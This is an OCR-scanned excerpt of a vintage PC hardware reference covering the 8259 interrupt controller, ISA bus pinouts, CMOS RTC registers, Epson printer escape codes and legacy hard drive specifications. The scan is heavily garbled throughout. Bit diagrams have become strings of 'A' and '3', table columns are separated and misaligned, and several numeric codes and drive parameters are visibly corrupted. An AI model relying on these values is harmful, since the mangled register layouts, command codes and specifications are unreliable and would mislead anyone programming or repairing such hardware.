\AAAAAARAAAR 0 = service tRO%: L= mask off 


Operation Control Word 2 / Interrupt Command Reg. (Ports 20h & AOh) 


37363534333231303 0CW2 - ICR Interrupt Command Register 
3 s 3 s 3 AAAAAAAAA interrupt request level to act upon 
3 AAAAAAAAAA must be © for O0CW2 
3 AAAAAAAAAKA must be 0 for 0CW2 
AAAAAAAAAAAAAAAA EOI type (see table) 


3 
3 


Bit 
765 
001 
010 
011 
100 
101 
110 
111 


3 
3 


Si 


3 


EOI - End Of Interrupt code (PC specific) 
non-specific EOI command 


NOP 


specific EOI command 

rotate in automatic EOI mode 

rotate on non-specific EOI command 
set priority command (uses bits 2-0) 
rotate on specific EOI command 


Operation Control Word 3 (Ports 20h & A0h) 


373 


7 
3 
3 
3 
3 
3 
3 
3 


6 
3 
3 
3 
3 
3 
3 


53 
3 
3 
3 
3 
3 


43332313038 O0CW3 


3 
3 


3 
3 


3 3 AAAA 1=read IRR on next read, 0O=read ISR on next read 
3 AAAAA 1=act on value of bit 0, ©O=no action if bit 0 set 


3 s AAAAAA 1=poll command issued, 0=no poll command issued 
3 AAAAAAA must be 1 for 0CW3 
AAAAAAAA must be 0 for O0CW3 


AAAAAAAAA 1=set special mask, O=reset special mask 


AAAAAAAAAA 1=zact on value of bit 5, O=no action if bit 5 set 
AAAAAAAAAKA not used (zero) 


Other Registers 


IRR - Interrupt Request Register, maintains a bit vector indicating 


which IRQ hardware events are awaiting service.Highest 


level interrupt is reset when the CPU acknowledges interrupt. 
ISR - In Service Register, tracks IRQ line currently being serviced. 
Updated by EOI command. 


AHardware Interrupt Sequence of Events: 
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8259 -IRQ- signal is raised high by hardware setting the 
corresponding IRR bits true. 


PIC evaluates the interrupt requests and signals the CPU 
where appropriate. 


CPU acknowledges the INT by pulsing INTA (inverted) 


INTA signal from CPU is received by the PIC, which then sets the 
highest priority ISR bit, and clears the corresponding IRR bit 


CPU sends a second INTA pulse which causes the PIC to send the 
interrupt ID byte onto the bus. CPU begins interrupt processing. 


Interrupts of lower and equal priority are blocked until a 
Non-Specific EOI (20h) is sent to the command port. 


NInitialization Procedure 


% In 


1. 
2. 
3. 


4. 
5. 


N8259 Pr 


itialization 

write ICW1 to port 20h 

write ICW2 to port 21h 

if ICW1 bit D1=1 do nothing 

if ICW1 bit D1=0 write ICW3 to port 20h 
write ICW4 to port 21h 

OCW's can follow in any order 


ogrammable Interrupt Controller Notes 


Operation Command Word (O0CW), commands that set the 8259 in 
various interrupt modes. These can be written to the 8259 
anytime after initialization. 

The 8259 differentiates between the 0CW1, OCW2 and 0CW3 by the 
port address and the value of the data bits D4 and D3. ICW2 
through ICW4 are order related and must follow ICWI. ICW1 is 
identified by an even port number and data bit D4 set to 1. 

PCs operate in fully nested mode, where a Non-Specific EOI resets 
the interrupt identified by the highest bit value in the ISR 
8259s can be chained together where the INT pin (output) of a 
slave 8259 can be used as the input to an IRQ line allowing up 
to 64 priority vectored interrupts. AT level machines use two 
8259's for a total of 16 hardware interrupt levels 

the first 8259 ports are located at 20h and 21h 

the second 8259 ports are located at AOh and A1h 

PC and AT interrupts are Edge Triggered while PS/2's are Level 
Triggered 

some ASIC chips designed for Tandy 1000 Systems malfunction if 
specific and non-specific EOISs are mixed 

for a more in-depth discussion of the 8259, see Intel's "Micro- 
processor and Peripherals Handbook, Volume I" 


see -—PORTS- and -INT TABLE- 
and AT 8 bit BUS Structure 


UARAKARMA, 
Ground À°B1 = A1AA -I/0 CH CHK (NMI) 
+Reset DRV A'B2 AZÀA +Data 7 
+5V A°B3 ASAA +Data 6 
+IRQ2 A’ B4 A4AÀ +Data 5 
-5V A'B5 ASAA +Data 4 
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+DRQ2 A’ B6 AGÀAA +Data 3 
-12V ÀA'B7 A7AA +Data 2 
-CARD SLCTD A’ B8 ASAÀ +Data 1 

+12V A B9 A9ÀA +Data 0 
Ground À'B10 A1044 +I/0 CH RDY 

-MEMW A°B11 A114À +AEN 

-MEMR A°B12 A1244 +Address 19 
-IOW A°B13 A1344 +Address 18 
-IOR A'B14 A14k% +Address 17 
-DACK3 A°B15 A154A +Address 16 

+DRQ3 A'B16 A1644 +Address 15 
-DACK1 A°B17 A174A +Address 14 

+DRQ1 A'B18 A18A4A +Address 13 

-DACKO (MREF) A°B19 A1944 +Address 12 

CLK À4°B20 A2044 +Address 11 


+IRQ7 A’B21 A2144 +Address 10 
+IRQ6 A’B22 A2244 +Address 9 
+IRQ5 A’B23 A2844 +Address 8 
+IRQ4 À’B24 A24%k +Address 7 
+IRQ3 A’B25 A2544 +Address 6 


-DACK2 A°B26 A264A +Address 5 

+TC A'B27 A274À +Address 4 

+ALE À°B28 A2844 +Address 3 

+5V A°B29 A2944 +Address 2 

+0SC A°B30 A3044 +Address 1 

Ground À’B31 A3144 +Address 0 
\AAAAAARAÙ 


NAT 16 Bit BUS Extension 


UAAAAAAAAG, 
-MEM CS16 A°'D1 C1AÀ SBHE 
-1/0 CS16 A 'D2 c2AÀ4 Address 23 

IRQ10 À4'D3 = C3A4 Address 22 
IRQ11 4'D4 = C4A4 Address 21 
IRQ12 À4°D5 = C244 Address 20 
IRQ15 À4'D6 = C6Al Address 19 
IRQ14 A'D7 c7À% Address 18 
-DACKO A'D8 cgA4i Address 17 
DRQO A 'D9 = COAA -MEMR 

-DACK5 A°D10 C1044 -MEMW 

DRQ5 A D11 C1144 Data 8 
-DACK6 A'D12 C1244 Data 9 
DRQ6 A'D13 C1344 Data 10 
-DACK7 A°D14 C244à% Data 11 
DRQ7 A'D15 C1544 Data 12 

+5V À'D16 C1644 Data 13 
-Master À'D17 C1744 Data 14 
Ground À'D18 C1844 Data 15 

AAAAAAAAAÙ 


- pin numbering starts from the rear of the machine 


% Signal Description 
AO-A19 Address Bits 0-19 allow access to 1Mb memory and 64K of 
port addresses. 
A17-A23 Address Bits 17-23 allow access from 1Mb memory to 16Mb 
AEN Address Enable; when active the DMA controller has 


control of the Address and Data BUS as well as the 
MEMR/MEMW lines. When inactive the CPU has control of 
these lines 
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ALE Address Latch Enable (output); used to latch addresses 
from the CPU. Forced active during DMA cycles. 

CARD SLCTD Card Selected; activated by cards in the XT's slot 8 

CLK System clock signal (actual BUS speed) 

DO -D7 Data bits 0-7 for I/0 to memory and 1/0 

DACKO-DACK3 DMA Acknowledge for channels 0-3; used by the controller 
to acknowledge DMA requested. DACKO is used for memory 
refresh (MREF) 

DRQ0-DRQ3 DMA Request 0-3; used by peripherals to get service from 
the DMA controller; Held active until the corresponding 
DACKx signal becomes active. 

1/0 CH CHK 1/0 Channel Check; Generates a Non Maskable Interrupt 

1/0 CH RDY 1/0 Channel Ready; pulled inactive my memory or 1/0 
devices to lengthen memory or 1/0 cycles. Usually used 
by slower devices to add wait states. Should not be 
held inactive for more than 17 cycles. 


I/0 CS16 I/O Chip Select 16 Bit; 16 bit 1/0 cycle 

IOR I/O Read; instructs an 1/0 device to drive its data 
onto the system BUS 

IOW I/0 Write; instructs an I/0 device to read data from 
the BUS 


IRQ2-IRQ7 Interrupt Requests 2-7; signals the CPU that an 1/0 
device needs service (see -8259-) 


MASTER Used with DRQ to gain control of system 
MEM CS16 Memory Chip Select 16 Bit; 16 Bit memory cycle 
MEMR Memory Read; this signal is driven by the CPU or DMA 


controller and instructs memory to drive its data onto 
the system BUS. Present on both PC and AT extension BUS 

MEMW Memory write; this signal is driven by the CPU or DMA 
controller and instructs memory to read and store data 
from the system BUS. Present on both PC and AT 
extension BUS 


OSC Oscillator; 14.31818 MHz clock (70ns period); 50% duty 
cycle 

RESET DRV Reset Drive; used to reset system logic 

SBHE System BUS High Enable; activates data bits 8-15 on AT 
extension BUS 

TC Terminal Count; pulses when the terminal count for a 


DMA channel is reached 


- all ISA BUS signals use standard TTL levels 
- input and output are relative to the CPU 


:capacitor values 
ACeramic File Capacitor Color Code Chart 


% 


% 
% 


Color Digit Multiplier 

Black © 1 

Brown 1 10 

Red 2 100 Gold fi 5% tolerance 
Orange 3 1,000 Silver fi10% tolerance 
Yellow 4 10, 000 White fil0% tolerance 
Green 5 100, 000 

Blue 6 1,000, 000 

Violet 7 

Gray 8 

white 9 


3 3 3 AAAAAAAAAAA tolerance/temperature dependance 
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3 3. AAAAAAAAAAKA picofarad value multiplier 
AAAAAAAAAAAAAAAA first 2 digits of picofarad value 
:CMOS RAM:CMOS clock:RTC 


ACMOS RTC - Real Time Clock and Memory (ports 70h & 71h) 
% Reg# Description 


00 RTC seconds 

©1 RTC seconds alarm 
02 RTC minutes 

03 RTC minutes alarm 
04 RTC hours 

05 RTC hours alarm 
06 RTC day of week 
07 RTC day of month 
08 RTC month 

09 RTC year 

OA RTC Status register A: 


37363534333231303 RTC Status Register A 
3 3 3 3 AAAAAAAAAARA rate selection Bits for divider output 


Si a frequency (set to 0110 = 1.024kHz, 976.562es) 
3 AAAAAAAAAAAAAAA 22 stage divider, time base being used; 
s (initialized to 010 = 32.768kHz) 


AAAAAAAAAAKAAAAA 1=time update in progress, O=time/date available 


OB RTC Status register B: 


37363 


534333231303 RTC Status Register B 

3 3 3 3 3 AAAAA 1=enable daylight savings, 0=disable (default) 
3 3 3 3 AAAAAA 1=24 hour mode, 0=12 hour mode (24 default) 

3 3 3 AAAAAAA 1=time/date in binary, 0=BCD (BCD default) 

3 3 AAAAAAAA 1=enable square wave frequency, 0=disable 

3 AAAAAAAAA 1=enable update ended interrupt, O=disable 
AAAAAAAAAA 1=enable alarm interrupt, O=disable 

AAAAAAAAAKA 1=zenable periodic interrupt, ©=disable 

AAAAAAAAAAAA 1=disable clock update, O=update count normally 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


OC RTC Status register C (read only): 


37363534333231303 RTC Status Register C (read only) 
3 3 3 3 AAAAAAAAARA reserved (set to 0) 

3 3 3 AAAAAAAAAAA update ended interrupt enabled 

3 3 AAAAAAAAAAA alarm interrupt enabled 

3 AAAAAAAAAKA periodic interrupt enabled 
AAAAAAAAAAKA IRQF flag 


OD RTC Status register D (read only): 


8736-03 RTC Status Register D (read only) 
z AAAAAA reserved (set to 0) 
AAAAAAA 1=CMOS RAM has power, ©=CMOS RAM has lost power 


OE Diagnostic status byte: 


373 


6353433323130? Diagnostic Status Byte 

3 3 s 3 3 AAAAAAA reserved 

3 3 3 3 AAAAAAAA 1=time is invalid, 0=0k (POST validity check) 
3 3 3 AAAAAAAAA 1=fixed disk 0 failed initialization, 0=ok 

3 3 AAAAAAAAKA 1=memory size doesn't match config info, ©=ok 

3 AAAAAAAAKAAA 1=invalid config info found, ®O=ok (see below) 
AAAAAAAAAAAKA 1=config record checksum is bad, 0=0k 
AAAAAAAAAAAAA 1=RTC lost power, O=power state stable 


7 
3 
3 
3 
3 
3 
3 
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OF 


10 


11 


12 


13 
14 


% 
% 


Shutdown status byte: 


soft reset or unexpected shutdown 
shut down after memory size determination 
shut down after memory test 

shut down with memory error 

shut down with boot loader request 
JMP DWORD request with INT init 
protected mode test 7 passed 
protected mode test 7 failed 
protected mode testi failed 

block move shutdown request 

JMP DWORD request without INT init 


DOO0O0NDODUIDSWNFOo 


Diskette drive type for A: and B: 


37363534333231303 Diskette drive type for A: and B: 
3 3 3 3 AAAAAAAAARA second diskette type 
AAAAAAAAAAAAAAAAKA first diskette type 


0000 no drive installed 
0001 DSDD 48 TPI drive 
0010 DSQD 96 TPI drive 
other values are reserved 


Reserved 
Fixed disk drive type for drive © and drive 1 


37363534333231303 Diskette drive type for A: and B: 
3 3 3 3 AAAAAAAAARA second hard disk drive code (0000=no disk) 
AAAAAAAAAAAAAAKAAAKA first hard disk drive code (0000=no disk) 


Reserved 
Equipment byte 


37363534333231303 Equipment byte 

3 3 3 3 3 3 3 AAAAA 1=diskette drives installed, O=none 
3 3 3 3 3 s AAAAAA 1=math coprocessor installed, ©O=none 
3 3 3 3 AAAAAAAAA unused 

3 3 AAAAAAKAAKA primary display 

AAAAAAAAAAAAA number of diskette drives installed 


Bits Bits 

54 Primary Display 76 Number of Drives 
00 reserved 00 1 diskette drive 

01 40 column color 01 2 diskette drives 
10 80 column color 10 reserved 

11 monochrome 11 reserved 


LSB of system base memory in 1k blocks 

MSB of system base memory in 1k blocks 

LSB of total extended memory in 1k blocks 

MSB of total extended memory in 1k blocks 

Drive C extension byte (reserved AT) 

Drive D extension byte (reserved AT) 

13 bytes reserved 

CMOS checksum of bytes 10h-20h (MSB) 

CMOS checksum of bytes 10h-20h (LSB) 

LSB of extended memory size found above 1 megabyte during POST 
MSB of extended memory size found above 1 megabyte during POST 
Date century byte in BCD ( BIOS interface to read and set) 
Information flags (set during power-on) 
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% 


3 


Pr 


Wr 
Re 


373635-03 Information Flags 

#% ARABA paservel 

3 AAAAAAKA initial setup message flag 

AAAAAAAKAA 1=IBM 128k expansion installed, O=none 


412 bytes reserved 


ogramming Considerations: 


ite CMOS address to read or write to port 70h 
ad/write port 71h to get/set data 


the information here is only applicable to AT and PS/2 systems 
INT 1A is used to read/set the Time of Day and Alarm. To use the 
alarm, INT 4A must be a valid interrupt service routine. 
configuration settings are maintained using the Motorola MC146818 
Real Time Clock. Each of this chips 64 memory registers is used 
for storage (0-3F). 

Bit 5 of the diagnostic (0Eh) status byte is set during a power 
on test. This Bit is set if no floppy disks are found or the 
display doesn't match the system display switch setting. 

all addresses sent to port 70h have Bits 7&6 clear since Bit 7 

of port 70h is used to enable/disable NMI. Setting this Bit 7 
enables NMI, clearing this Bit disables NMI. 

when masking the NMI through using port 70H, port 71H should be 
read immediately after or the RTC may be left in an unknown state. 
This wont affect the PS/2 watchdog timer or system channel timeout. 


see -INT 1A- 


:Epson printer codes 
AEpson FX Printer Codes 


% 
% 


% 
% 


Pr 
De 


Ve 
De 


inter Operation: 
cimal ASCII Description 
BEL Beeper 
DC1 Select printer 
DC3 Deselect printer 
25 48 ESC EM 0 Turn cut sheet feeder control off 
25 52 ESC EM 4 Turn cut sheet feeder control on 
56 ESC 8 Disable paper out sensor 
57 ESC 9 Enable paper out sensor 
60 ESC < Select unidirectional mode for one line 
64 ESC @ Initialize printer 
85 48 ESC U 0 Cancel unidirectional mode 
85 49 ESC U 1 Select unidirectional mode 
115 48 ESC s 0 Turn half speed mode off 
115 49 ESC s 1 Turn half speed mode on 
rtical/Horizontal Motion: 
cimal ASCII Description 
BS Backspace 
HT Horizontal tab 
LF Line Feed 
VT Vertical Tab 
FF Form Feed 
47 Cc ESC / c Select vertical tab channel (c=0..7) 
48 ESC 0 Select 8 lines per inch 
49 ESC 1 Select 7/72 inch line spacing 
50 ESC 2 Select 6 lines per inch 
51 n ESC 3 n Select n/216 inch line spacing (n=0..255) 
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27 65 n ESC A 
27 66 0 ESC B 
27 66 tabs ESC B 


27 67 n ESC C 
27 67 48 n ESC C 
27 68 0 ESC D 
27 68 tabs 0 ESC D 
271 14 n ESC J 
27 18 n ESC N 
27 19 ESC 0 

27 81n ESC 


Q 
27 98 b c 0 ESC bh 
27 98 c tabs ESC b 


27 101 48 s ESC e 
27 101 49 s ESC e 
27 102 48 s ESC f 
27 102 49 s ESC f 
27 106 n ESC j 
27 108 n ESC 1 

% Printing Style: 

% Decimal ASCII 
27 33 n ESC ! 


27 107 48 ESC k 

27 107 49 ESC k 

27 120 48 ESC x 

27 120 49 ESC x 
% Print Size and Char 
% Decimal ASCII 

14 to) 

15 SI 

18 DC2 

20 DC4 

27 14 ESC SO 

27 15 ESC SI 

21 17 ESC M 

27 80 ESC P 


27 87 48 ESC W 0 
27 87 49 ESCW1 


% Print Enhancement: 

% Decimal ASCII 
27 45 48 ESC - 0 
27 45 49 ESC - 1 


27 69 ESC E 
27 10 ESC F 
271 11 ESC G 
27 12 ESC H 


27 83 48 ESC S 0 
27 83 49 ESC S 1 
27 84 ESC T 


Pagina 619 di 991 


n Select n/72 inch line spacing (n=0..85) 

NUL Clear Vertical tabs 

tabs Select up to 16 vertical tabs where tabs are 
ascending values from 1..255 ending with NUL 

n Select page length in lines (n=1..127) 

O n Select page length in inches (n=1..22) 

NUL Clears all horizontal tables 

tabs NUL Sets up to 32 horizontal tabs with 
ascending values 1-137. NUL or a value 

less than previous tab ends command. 


n Immediate n/216 inch line feed (n=0..255) 
n Select skip over perforation (n=1..127) 
Cancel skip over perforation 

n Set right margin (n=column) 


c NUL Clear vertical tabs in channel (c=0..7) 

c tabs Select up to 16 vertical tabs in channels 

(c=0..7) where tabs are ascending values 

from 1..255 ending with NUL 

S Set horizontal tab to increments of 'sS' 

S Set vertical tab to increments of 's' 

S Set horizontal skip to increments of 's' 

S Set vertical skip to increments of 's' 
Reverse linefeed (n/216 inch after buffer) 
Set left margin (n=column) 


DI-pOH-HO 


Description 
n Master select where n is a combination of: 
Pica 16 Double Strike 
Elite 32 Double Wide 
Condensed 64 Italic 
Emphasized 128 Underline 
Pica & Elite and Condensed/Emphasized are 
mutually exclusive 


OpSHPO 


(0) Select NLQ Roman font 

L Select NLQ Sans Serif font 
(0) Select draft mode 

1 Select NLQ mode 

acter Width: 


Description 

Select double width for one line 

Select condensed mode 
Cancel condensed mode 
Cancel one line double width mode 
Double width for one line (duplicate) 
Select condensed mode (duplicate) 
Select elite width (12 cpi) 
Select pica width (10 cpi) 

Cancel double width mode 

Select double width mode 


Description 

Cancel underlining 

Select underlining 
Select emphasized mode 
Cancel emphasized mode 
Select double strike mode 
Cancel double strike mode 

Select superscript 

Select subscript 
Cancel superscript/subscript 


% 
% 


% 
% 


% 
% 


% 
% 


Character Sets: 


Decimal ASCII Description 
27 52 ESC 4 Select italic mode 
27 53 ESC 5 Cancel italic mode 
27 54 ESC 6 Enable printing of characters (128-159,255) 
27 55 ESC 7 Cancel [ESC 6] command 
27 82n ESCRn Select International character set where 
numeric 'n' is: 
O USA 7 Spain I 
1 France 8 Japan 
2 Germany 9 Norway 
3 United Kingdom 10 Denmark II 
4 DenmarkI 11 Spain II 
5. Sweden 12 Latin America 
6 Italy 


27 116 0 ESC t NUL Select italic character set 
27 116 1 ESC t SOH Select Epson character set 


User Defined Characters: 


Decimal ASCII Description 

27 37 0 ESC % NUL Selects normal character set 

27 37 1 ESC % SOH Selects user defined set 

27 38 0 ESC & NUL ? Select user defined chars (see manual) 
27 58 0 00 ESC : NUL NUL NUL Copy ROM into RAM 

Graphics Character Sets: 

Decimal ASCII Description 

27 42 0 n1 n2 ESC * NUL n1 n2 Select single density graphics 
27 42 1 n1 n2 ESC * SOH n1 n2 Select double density graphics 
27 63sn ESC ? sn Reassign graphics mode 


's'=(K,L,Y or Z) to mode 'n'=(0..6) 
27 15 n1 n2 ESC K n1 n2 Single density graphics (60 dpi) 
27 716 n1 n2 ESC L n1 n2 Double density graphics (120 dpi) 
27 89 n1 n2 ESC Y n1 n2 Hi-speed double den graphics (120 dpi) 
27 90 n1 n2 ESC Z n1 n2 Quad density graphics (240 dpi) 
27 94 m n1 n2 ESC A m n1 n2 Select 9 pin graphics mode 


number of columns = n1 + (n2 * 256) 


Other: 
Decimal ASCII Description 
13 CR Carriage Return 
24 CAN Cancel text in line (but not control codes) 
127 DEL Delete character (but not control codes) 
27 32 n ESC SP n Space in n/72 inch following each NLQ char 
27 35 ESC # MSB control sequence cancel 
27 36 ESC $ Select absolute dot position 
27 61 ESC = MSB = 0 
27 62 ESC > MSB = 1 
27 13 48 ESC I 0 Cancel above [ESC I 1] 
27 13 49 ESCI1 Printable codes expansion (0-31,128-159) 
27 92 ESC \ Select relative dot position 
27 97 n ESC an NLQ justification where numeric 'n' is: 
O left justification (default) 
1 center 
2 right justification 
3 full justification 
27 112 ESC p Select/cancel proportional mode 


- the codes listed are relative to the Epson LX 800 
- in several situations where a numeric value of zero or one is 
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required, 


the ASCII value of the number can be substituted 


:hard disks drives:drive specifications:disk drives:hard drives 
AHard Drive Specifications 


% 
% Manufacturer MB 
Alloy 
Atasi 
Atasi 
Atasi 
Atasi 
Atasi 
Bull 
Bull 
Bull 
Bull 
Bull 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CDC 
CMI 
CMI 
CMI 
CMI 
CMI 
CMI 
CMI 
CMS 
CMS 
CMS 
CMS F80-K 
Columbia SCSI 
Core AT40F 
Core AT43 
Core HC150 
Emerald DOS 150-3000 
Emulex ATS-170 
Emulex ATS-380 
FlashCard 49 
Fuji 302-13 
Fuji 302-26 
Fujitsu M2230AS 
Fujitsu M2233AS 
Fujitsu M2234AS 
Fujitsu M2235AS 
Fujitsu M2241AS 
Fujitsu M2242AS 
Fujitsu M2243AS 
Fujitsu M2263 
Hitachi DK511-5 
Hitachi DK511-8 


ID-160 
AT3020 
AT3033 
AT3046 
AT3051 
AT3085 
D530 
D550 
D570 
D585 
D530 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 
Wren 


125 


I 9415-21 

I 9415-36 

9415-25 
9415-30 
9415-38 
9415-48 
9415-51 
9415-67 
9415-86 
9416-182 


42 


49 
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AVg Miscellaneous 
Cyl Hds Access Information 
30 
635 3 Wedge servo 
635 5 Wedge servo 
635 7 
703 7 
1024 8 
987 3 
987 5 
987 7 
987 7 
1166 3 
697 3 STnn, MFM, Voice coil 
697 5 STnn, MFM, Voice coil 
615 4 STnn, MFM, Voice coil 
989 3 STnn, MFM, Voice coil 
733 5 STnn, MFM, Voice coil 
925 5 STnn, MFM, Voice coil 
42 989 5 28. STnn, MFM, Voice coil 
925 7 STnn, MFM, Voice coil 
69 925 9 STnn, MFM, Voice coil 
144 969 9 STnn, MFM, Voice coil 
380 15 16 ESDI/SCSI, FH 
702 15 16 ESDI/SCSI, FH 
766 15 16.5 ESDI/SCSI, FH 
15 16.5 SCSI, FH 
612 4 
256 4 
256 4 
256 4 
615 4 
640 4 
640 4 
42 1024 5 22. STnn, MFM, Voice coil 
42 1024 7. STnn, MFM, Voice coil 
42 1024 8. STnn, MFM, Voice coil 
42 1024 9 STnn, MFM, Voice coil 
834 3 19 SCSI, RLL, Band stepper 
40 564 4 10 ESDI, MFM, Voice coil 
43 988 5 20 STnn, MFM, Voice coil 
150 1024+ 18 ESDI 
150 1024+ ESDI 
142 1022 SCSI & ESDI 
310 1222 SCSI & ESDI 
615 6 28 STnn, RLL, Voice coil 
10 612 2 
20 612 4 
320 2 
10 320 4 
320 6 
21 320 8 56 
754 4 
43 754 7 33 STnn, MFM, Voice coil 
72 754 11 33 STnn, MFM, Voice coil 
14 16 ESDI/SCSI, FH 
699 7 
823 10 


Hitachi DK5 
Hitachi DK5 
IMI 5006H 
IMI 5012H 
IMI 5018H 
Imprimis (s 
Irwin 416 
Irwin 510 
Irwin 516 
Irwin 561 
Kalok KL320 
Kalok KL330 
Maxtor XT10 
Maxtor XT10 
Maxtor XT11 
Maxtor XT11 
Maxtor XT11 
Maxtor XT20 
Maxtor XT21 
Maxtor XT21 


15C-78 
15-78 


ee CDC) 


65 
85 
05 
40 
90 
85 
40 


90 160 


Maxtor 
Maxtor 
Maxtor 
Maxtor 


XT4170E 
XT4230E 
XT4380E 
XT4380S 


XT83 
XT83 


Maxtor 
Maxtor 
Maxtor XT87 
Maxtor XT87 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Micropolis 
Microscienc 
Microscienc 
Microscienc 
Microscienc 
Microscienc 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
Miniscribe 
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80E 

80S 

60E 

60S 
1302 
1303 
1304 
1323 
1323A 
1324 
1324A 
1325 
1333A 
1335 
1355 
1518 
1558 
1568 
1578 
1588 
1598 

e HH312 
e HH325 
e HH612 
e _HH725 
e HH1050 
1006 
1012 
2006 
3012 
3053 
3212 
3412 
3425 
3438 
3650 
3650F 
3675 
4010 


780u 8 16 SCSI, FH 
780u 8 16 ESDI, FH 
306 2 
306 4 
306 6 
819 2 
628 2 HD/tape 
819 2 HD/tape 
180 4 
26U 615 4 40 STnn, MFM, Band stepper 
38u 615 4 40 STnn, RLL, Band stepper 
918 7 28 STnn, Voice coil 
1024 8 28 STnn, Voice coil 
918 11 28 STnn, Voice coil 
918 15 28 STnn, Voice coil 
1224 28 STnn, Voice coil 
1224 7 28 STnn, Voice coil 
1224 11 STnn, Voice coil 
1224 15. STnn, Voice coil 
1790 1224 7 14 ESDI, MFM, FH Voice coil 
231U 1224 9 16 ESDI, MFM, FH Voice coil 
384U 1224 15 16 ESDI, MFM, FH Voice coil 
3840 1224 16 SCSI, MFM, FH Voice coil 
410u 14.5 ESDI, FH 
410u 14.5 SCSI, FH 
768u 16.5 ESDI, FH 
768u 16.5 SCSI, FH 
830 3 
830 5 
830 6 
1024 4 
1024 5 
1024 6 
1024 7 
1024 8 
44 1024 5 28 STnn, MFM, Voice coil 
dA 1024 8 30 
142 1022 
1.2Gu 15 14 ESDI, FH 
382u 15 18 ESDI, FH 
765u 15 16 ESDI, FH 
382u 15 18 SCSI, FH 
765u 15 16 SCSI, FH 
1.2Gu 15 14 SCSI, FH 
10 306 4 
20 612 4 
10 306 4 
21 612 4. Band stepper 
44 1024 5 28 STnn, MFM, Voice coil 
306 2 
306 4 
306 2 
10 612 4 
44 1024 6 25 STnn, MFM, Voice coil 
10 612 4 
306 4 
20 615 4 
31.2 615 4 
50u 809 6 61 STnn, MFM, linear drive 
50u 809 6 46 STnn, MFM, linear drive 
75U 809 6 61 STnn, MFM, linear drive 
480 2 


Miniscr 
Miniscr 
Miniscr 
Miniscr 
Miniscr 
Miniscr 
Miniscr 
Miniscr 
Miniscr 
Miniscr 
Miniscr 
Miniscr 
Mitsubi 
NEC D56 
NEC D56 
NEC D58 
NEC D58 
NEC 512 
NEC 512 
NEC 514 


ibe 4020 
ibe 6032 
ibe 6053 
ibe 6085 
ibe 6128 
ibe 8051A 
ibe 8212 
ibe 8425 
ibe 8438 
ibe 9380E 
ibe 9380S 
ibe 9780E 
si MR535 
62 

82 

62 

82 

4 

6 

6 


Newberry Penny 340 
Northgate Turbo 
Plus Hardcard 40 


Priam I 
Priam I 
Priam I 
Priam I 


D45ATD2 
D130 
D40 

D60 


Priam V130 
Priam V185 


Priam 6 
Priam 6 
Priam 7 
Priam 7 


38 
76 
38 
76 


Quadram Q520 
Quadram Q530 
Quadram Q540 


Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
Rodime 
RMS 503 
RMS 506 
RMS 512 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
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R0101 
R0102 
R0103 
R0104 
R0201 
R0202 
R0203 
R0204 
R0201E 
R0202E 
R0203E 
R0204E 
R0252 
R0352 
R03055 


ST125 
ST125N 
ST138 
ST138N 
ST138R 
ST151 
ST157A 
ST157N 
ST157R 


21 


32 


43 


480 4 
26 1024 3 
43. 1024 5 
71 1024 8 

104 1024 8 
51u 745 4 
615 2 
20 615 4 
31.2 615 4 
382U 1224 15 
382U 1224 15 
781u 
42 981 6 
385u 
765u 
385u 
765u 
310 4 
612 4 
615 8 
615 8 
42 809 6 
42 612 4 
42 1166 5 
130 1224 
987 5 
987 7 
987 3 
1166 7 
382u 
765u 
382u 
765u 

512 4 

512 6 

512 8 

192 2 

192 4 

192 6 

192 8 

320 2 

320 4 

320 6 

320 8 

640 2 

640 4 
640 6 

640 8 
306 4 
306 4 
872 7. STnn, 

153 2 

153 4 

153 8 
615 4 28 
22 407 4 
615 6 28 
cal 615 4 
33 615 4 
977 5 STnn, 
49 560 6 
49 615 6 
49 615 6 


28 STnn, MFM, FH Voice coil 


28 STnn, MFM, Voice coil 
STnn, MFM, 3« 


16 ESDI, RLL, FH Voice coil 
16 SCSI, RLL, FH Voice coil 
15 17 ESDI, FH Voice coil 
STnn, MFM, 5- Voice coil 
18 ESDI, FH 
18 16 ESDI, FH 
18 SCSI, FH 
18 16 SCSI, FH 


36 STnn, RLL, Voice coil 

40 STnn, RLL, Voice coil 

20 STnn, MFM, Voice coil 
STnn 


15 18 ESDI, 5- 
15 14 ESDI, 5- 
15 18 SCSI, 5 
15 14 SCSI, 5a 


MFM, Voice coil 


STnn, MFM, Band stepper 
SCSI, RLL, Band stepper 

STnn, MFM, 3« Band stepper 

28 SCSI, RLL, Band stepper 

28 STnn, RLL, Band stepper 
MFM, Voice Coil 

28 IDE, 3« 

28 SCSI, 3« RLL, Band stepper 

28 STnn, 3« RLL, Voice Coil 


ST177N 
ST206 
ST213 
ST225 
ST225N 
ST225R 
ST238R 
ST250R 
ST251 
ST251-1 
ST251N0 
ST251N1 
ST251R 
ST277 
ST277NO 
ST277N1 
ST277R 
ST280A 
ST296N 
ST406 
ST412 
ST419 
ST425 
ST506 
ST1096N 
ST1102A 
ST1144 
ST1239 
ST4026 
ST4038 
ST4051 
ST4053 
ST4077R 
ST4096 
ST4144R 
SA 604 
SA 606 
SA 612 
SA 712 


Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Seagate 
Shugart 
Shugart 
Shugart 
Shugart 


SPC Scorecard 44 


Syquest SQ3O06RD 
Syquest SQ312RD 
Syquest SQ325F 
